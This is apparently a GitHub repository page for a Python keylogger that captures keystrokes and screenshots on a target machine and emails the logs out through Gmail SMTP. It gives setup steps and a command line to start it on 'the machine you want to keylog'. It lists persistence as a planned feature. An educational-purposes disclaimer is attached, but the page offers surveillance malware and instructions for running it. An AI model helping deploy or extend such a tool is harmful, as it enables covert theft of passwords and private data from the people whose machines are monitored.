Skip to content

Cennef0x/Python-Keylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Copyright (C) 2020 Cennef0x

Python-Keylogger

Python Keylogger with screenshots

This program is free software: you can redistribute it and/or modify it


This script was made available for informational and educational purposes only. Any actions and or activities related to the material contained within this repository is solely your responsibility.The misuse of the information in this repository can result in criminal charges brought against the persons in question. The author will not be held responsible in the event any criminal charges be brought against any individuals misusing the scripts in this repository to break the law.

This script use gmail smtp servers, you will need and account to send the keystrokes log.

STEP 1 - Install the requirements

STEP 2 - Add your API KEY into screenshoter.py at line 20

STEP 3 - Start the script from the console in the machine your want to keylog :

python main.py "myemail@gmail.com" "myemailpassword" "theemailyouwanttosendthelogs@mail.com

To stop it close the cli or kill the process if you use executed this script without the console


To-Do

  • Make it persistent